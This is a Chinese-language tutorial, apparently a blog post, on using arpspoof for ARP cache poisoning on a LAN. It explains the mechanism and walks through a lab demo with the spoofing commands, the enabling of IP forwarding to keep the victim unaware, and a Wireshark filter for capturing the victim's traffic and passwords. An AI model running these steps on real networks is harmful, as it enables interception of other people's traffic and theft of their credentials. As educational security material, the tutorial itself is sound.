0x00 工具簡介
arpspoof是一款進行arp欺騙的工具,***者通過毒化受害者arp緩存,將網關mac替換爲***者mac,然後***者可截獲受害者發送和收到的數據包,可獲取受害者賬戶、密碼等相關敏感信息。
0x01 arpspoof 工作原理簡介
關於arp的工作原理,我們在前面的文章已經介紹過了。
arp工作原理剖析
根據arp的工作原理,我們知道,PC或手機端需要通過arp緩存中IP和Mac地址的對應關係,來確定誰是網關?然後將數據包發送給網關,然後由網關將請求的數據轉發到互聯網。而確定IP和Mac對應關係的arp請求包是在整個局域網內進行廣播的,所以,kali就有可以通過響應arp包來把自己僞裝成網關。
arpspoof就是這樣一個工具,在局域網中通過響應指定客戶端的arp包來把自己僞裝成網關,從而截獲靶機的請求信息。
0x02 安裝及使用
1、一般情況下,kali、parrot等***os都是集成了arpspoof的,如果你的系統沒有安裝的話,可以使用命令手動安裝。
安裝apt install arpspoof #安裝arpspoof
2、相關語法
語法arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
參數-i interface 指定要使用的接口。-c own|host|both 指定範圍own|host|both(自己|主機|兩者)-t target 指定一臺特定主機進行ARP中毒(如果未指定,則爲LAN上的所有主機)-r 毒害兩個主機(主機和目標)以捕獲兩個方向的流量。(僅對-t有效)host 指定您希望攔截數據包的host(通常是本地網關)
示例 arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 # eth0爲***者使用的網卡 # 192.168.1.100爲***目標的IP # 192.168.1.1爲***目標的網關
0x03 ***流程演示
1、環境配置
靶機 :192.168.107.185 / windows7
網關 :192.168.107.244/ Mac地址 f0 - - - - 33
***者:192.168.107.109 / Mac地址 00-0c-29-71-2d-1b
在靶機端,我們可以看到arp緩存中,網關是192.168.107.244,Mac地址指向f0 - - - -33,我們需要讓靶機認爲網關是***者的Mac 00-0c-29-71-2d-1b
2、***者開始僞裝
root@kali:/# arpspoof -i eth0 -t 192.168.107.185 192.168.107.244
# 192.168.107.185爲靶機地址
# 192.168.107.244爲網關地址
3、開始***
4、查看靶機的arp緩存
arp -a | findstr 244 #查看包含244地址的arp信息
可以看到,網關192.168.107.244的Mac地址已經指向了kali的Mac地址,欺騙靶機成功,這樣靶機所有發送到網關的數據包(請求信息,用戶名 密碼等等)都會通過發送給kali
所以,kali還需要扮演網關的角色,將數據包轉發到互聯網上去,否則靶機就無法正常上網,靶機就能感知到網絡出問題了。
5、kali開啓轉發功能
#開啓數據轉發功能root@kali:/# echo 1 > /proc/sys/net/ipv4/ip_forward
開啓轉發功能後,測試網絡搜索正常。
0x04 截取靶機上網信息
1、使用wireshark抓包工具來截取數據包
#wireshark過濾數據包,來源和目的地是靶機的數據包ip.src==192.168.107.185||ip.dst==192.168.107.185
2、截取到的訪問百度的信息如下: